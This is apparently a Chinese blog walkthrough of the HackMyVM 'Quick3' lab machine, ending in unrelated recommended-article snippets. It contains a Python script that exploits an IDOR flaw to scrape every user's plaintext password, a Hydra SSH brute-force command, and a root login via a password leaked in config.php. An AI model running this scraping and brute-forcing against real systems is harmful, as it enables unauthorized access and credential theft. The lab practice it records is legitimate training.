quick3-hydra

已于 2024-06-17 10:34:11 修改
阅读量442 收藏 5
点赞数 5
分类专栏: HackMyVM 文章标签: python 网络 安全 hack oscp
于 2024-04-22 17:10:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/138083951
版权

kali和quick3都设置NAT模式

quick3easy漏洞挖掘、越权测试、python爬虫、脚本编写、hydra 爆破、凭据收集

主机发现

netdiscover -i eth0 -r 192.168.44.193/24

服务探测

nmap -sV -A -T4 -p- 192.168.44.133

得到只开放了80和22端口

访问80web
dirb目录扫描
找到后台`http://192.168.44.133/customer/

水平越权

任意用户注册账号,登录
查看用户信息,url有?id,尝试修改id,发现水平越权漏洞,查看其他用户密码

写爬虫爬取所有用户密码

import os 
import re
from datetime import datetime
import requests
import urllib3
from colorama import init
init(autoreset = True)

def write1(user_match):
	curr_dir = os.getcwd()
	vuln_file = '/user_' + datetime.now().date().strftime('%Y%m%d')+'.txt'
	f = open(curr_dir + vuln_file,'a+',encoding='utf-8')
	f.write(f"{user_match}"+"\n")
	f.close()
	
def write2(pass_match):
	curr_dir = os.getcwd()
	vuln_file = '/pass_' + datetime.now().date().strftime('%Y%m%d')+'.txt'
	f = open(curr_dir + vuln_file,'a+',encoding='utf-8')
	f.write(f"{pass_match}"+"\n")
	f.close()	

def poc_url(id):
	urllib3.disable_warnings()
	url1 = f"http://192.168.44.133/customer/user.php?id={id}"
	proxy = {
		'http':'http://127.0.0.1:8080',
		'https':'http://127.0.0.1:8080'
	}
	headers = {
		"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
		"Cookie":"PHPSESSID=dv5jvd9q7d5e6tk0itdfj5f96d"
	}
	res = requests.get(url1,headers=headers,proxies=None,verify=False,timeout=5)
	if res.status_code == 200:
		user_match = re.search(r'<input type="text" id="name" name="name" value="([^"]+)" required>',res.text).group(1).lower().split()[0]
		pass_match = re.search(r'<input type="password" id="oldpassword" name="oldpassword" value="([^"]+)" required>',res.text).group(1)
		
	write1(user_match)
	write2(pass_match)

if __name__ == '__main__':
	for i in range(1,30):
		poc_url(i)




# python写程序遇到了这个问题,vim打开时最后一个字符都是^M,导致输出的文本不可读出内容,只能用文本编辑器打开。file多了个with CR line terminators,转换成unix也不能解决,最后把换行符号换成"\n"才解决!

爆破SSH

hydra -L user_20240416.txt -P pass_20240416.txt -t 16 ssh://192.168.44.133

拿Flag

cat user.txt
HMV{717f274ee66f8541a3031f175f615e72}

提权

ls /var/www/html
cat /var/www/html/customer/config.php
'root', 'fastandquicktobefaster'
su root

HMV{f178761104e933f9341f13f64b38538a}
是乙太呀
关注
专栏目录
Quick3 - hackmyvm
tanbinn的博客
02-20 406
难度:简单靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Hydra - 京东开源的基于Dubbo的调用分布跟踪系统
热门推荐
wilsonke的专栏
10-09 4万+
 Hydra - 京东开源的基于Dubbo的调用分布跟踪系统 1 概述1.1 研发背景 支撑互联网应用的各种服务通常都是用复杂大规模分布式集群来实现的。而这些互联网应用又构建在不同的软件模块集上,这些软件模块,有可能是由不同的团队开 发、可能使用不同的编程语言来实现、有可能布在了几千台服务器,横跨多个不同的数据中心。因此,就需要一些可以帮助理解系统行为、用于分析性能问题的工 具。
HYDRA - 京东开源的基于DUBBO的调用分布跟踪系统
做的过程自我总结
04-11 358
1 概述1.1 研发背景支撑互联网应用的各种服务通常都是用复杂大规模分布式集群来实现的。而这些互联网应用又构建在不同的软件模块集上,这些软件模块,有可能是由不同的团队开 发、可能使用不同的编程语言来实现、有可能布在了几千台服务器,横跨多个不同的数据中心。因此,就需要一些可以帮助理解系统行为、用于分析性能问题的工 具。hydra分布式跟踪系统就为了解决以上这些问题而设计的。1.2 理论依据Googl...
hackmyvm】 Quick2靶机
woshicainiao666的博客
04-23 609
发现文件包含漏洞(但不能访问日志文件),有用的用户名(不知道密码),返回页面,看看还有什么,没有注意到的点这里有一个联系方式,试试ssh连接,不行,然后我又使用hydra爆破了,没有成功不行,发现不了其他的漏洞,只能使用工具扫描。
Using the Hydra Process Manager
资源备忘
08-17 1716
https://wiki.mpich.org/mpich/index.php/Using_the_Hydra_Process_Manager Using the Hydra Process Manager Jump to: navigation,search Contents  [hide]  1 General2 Quick Start3 Envi
219-6-3Google浏览器书签备份
qq_43046057的博客
06-03 3631
WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称 链接 添加时间 WEB漏洞测试(二)——HTML注入 & XSS攻击 - CSDN博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - CSDN博客...
mac下安装python3
WorldMvp的专栏
10-14 4936
mac下安装python3 1.先用brew search命令查看 brew search python3 结果如下所示: ==> Formulae boost-python3 python3 python@3 If you ...
nethunter自带 kali-tools-web更新
wjwqp的专栏
02-03 830
!](https://img-blog.csdnimg.cn/b1994459bedfd0 Hit:1 http://mirrors.neusoft.edu.cn/kali kali-rolling 在这里插入图片描述 graph TD; A-->B; B-->C; ![在这里插入图片描述](https://img-blog.csdnimg.cn/7affff8511d94f2da5b1c66dd0eed94a.png?x-oss-process=image/watermark,type_d
Tryhackme-Pentesting Tools
个人博客
09-14 1029
Pentesting Tools 文章目录Pentesting ToolsNmaptask1 Deploytask2 Introductiontask3 Nmap Switchestask4 **Scan Types** Overviewtask5 **Scan Types** TCP Connect Scanstask6 **Scan Types** SYN Scanstask7 **Scan Types** UDP Scanstask8 **Scan Types** NULL, FIN and X
.emacs.d:我的Emacs配置
03-06
init-hydra-one-key.el :基于hydra插件的快捷键统一配置(包含模式和插件的快捷键) init-local-path.el : init-my-awesome-function.el :自己编写的更好用的自定义函数 init-package.el :程序包相关配置 init...
17-2 信息收集 - 端口
weixin_43263566的博客
12-19 1057
知道目标开放的端口和对应的版本信息,就可以针对性的寻找漏洞,对后期的渗透很有帮助。nmap是一款跨平台的开源端口扫描器,在安全渗透领域具有强大的功能.版本扫描(速度有点慢,我等了快两分钟)
mac安装MySQL-very easy
青苔小榭
07-05 2652
文章目录1.命令:2.安装过程3.启动MySQL4.设置密码5.遇到问题 方法:直接用Homebrew安装 1.命令: brew install mysql 2.安装过程 zhangjingyideMacBook-Pro:~ zhangjingyi$ brew install mysql Updating Homebrew... ==> Auto-updated Homebrew! U...
python GUI编码入门-21】如何用Tkinter创建一个记事本应用
木头大左的博客
11-08 48
在现代编程环境中,图形用户界面(GUI)应用程序的开发变得越来越重要。Python的Tkinter库是一个功能强大且易于使用的GUI工具包,非常适合初学者和有经验的开发者使用。本文将详细介绍如何使用Tkinter创建一个简易的记事本应用,涵盖从安装到实现各项功能的全过程。Tkinter是Python的标准GUI库,它提供了丰富的接口来创建窗口、对话框、按钮等常见的GUI组件。Tkinter具有良好的跨平台性,可以在Windows、Mac OS和Linux上运行。
一次薅国家超算平台的记录
weixin_55179972的博客
11-07 407
参与 谁是下一个“AI”跃人 -AI体验推介活动,赢取千元算力券!(https://www.scnet.cn/home/subject/modular/index270.html)2. Clone开源的Llama3 Chinese (https://github.com/LlamaFamily/Llama-Chinese)活动名称主题:国家超算互联网「AI跃升季」:谁是下一个“AI”跃人 - AI算力体验活动。其中位置1,2替换为商品基模型和训练出来的微调模型。模型改为商城下载的模型。2、运行的过程记录。
推荐一款管道数据检索工具:Pipedata-Pro
11-09 340
是一款专为设计石油、天然气、水和蒸汽管道及管道系统的工程师开发的应用程序。该应用程序提供了设计管道系统所需的工程数据,拥有一个全面的管道类型、配件和材料。
2024年华为OD机试真题-查找充电设备-C++-OD统一考试(E卷)
面试高手的博客
11-08 234
某个充电站,可提供n个充电设备只,每个充电设备均有对应的输出功率任意个充电设备组合的输出功率总和,均构成功率集合P的1个元素功率集合P的最优元素,表示最接近充电站最大输出功率pmax 的元素。每一题都含有详细的解题思路和代码注释,精编c++、JAVA、Python三种语言解法。当充电设备输出功率50、20、20组合时,其输出功率总和为90,最接近充电站最大充电输出功率,因此最优元素为90。所有充电设备的输出功率组合,均大于充电站最大充电输出功率30,此时最优元素值为0。第 2 行为每个充电设备的输出功率。
大模型落地之ollama控制设备
weixin_44772948的博客
11-10 46
本地环境:ollama3.2(理论上ollama3.1以上就支持tool功能,但是笔者没有试过)(PS:不足点,在输入不是控制指令的相关问题时,大概率也会调用工具,需要后续调优)
Golang--文件操作
cookies_s_的博客
11-07 418
文件操作
逐行加载 HTML 内容并实时显示效果:使用 wxPython 的实现
最新发布
Winfredzhang的博客
11-10 466
self.lines = [] # 用于存储HTML文件的行内容self.line_index = 0 # 当前行的索引self.timer = wx.Timer(self) # 创建定时器self.Bind(wx.EVT_TIMER, self.OnTimer, self.timer) # 绑定定时器事件定义self.lines用于存储 HTML 文件的行,表示当前行索引,self.timer为定时器,用于逐行加载 HTML 内容。事件绑定到OnTimer方法。本文演示了如何使用wxPython
lightning-hydra-template
01-29
lightning-hydra-template 是一个用于快速开发基于 PyTorch 和 Lightning 框架的深度学习模型的模板。它结合了 Lightning 框架的便利性和灵活性,以及 Hydra 配置系统的强大功能,帮助开发者快速构建和调试复杂的深度学习模型。 该模板提供了一套标准的目录结构和文件布局,使得开发者可以轻松地组织和管理他们的代码。它还包含了一些常用的模型组件和工具函数,例如数据加载器、损失函数、优化器等,减少了重复编写代码的工作量,提高了开发效率。 在配置方面,lightning-hydra-template 使用 Hydra 配置系统,允许用户将模型、训练参数、优化器等各种配置信息进行统一管理,并可以轻松实现不同配置的切换和复用。这使得模型的配置和超参数调整变得非常灵活,同时也方便了模型的复现和共享。 除此之外,lightning-hydra-template 还提供了一些实用的训练脚本和命令行参数,帮助用户快速搭建训练流程,并且支持分布式训练和 GPU 加速,适用于各种规模的深度学习项目。 总之,lightning-hydra-template 是一个功能强大、易于使用的深度学习模型开发模板,为开发者提供了便利的工具和流程,帮助他们更快地构建和调试深度学习模型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值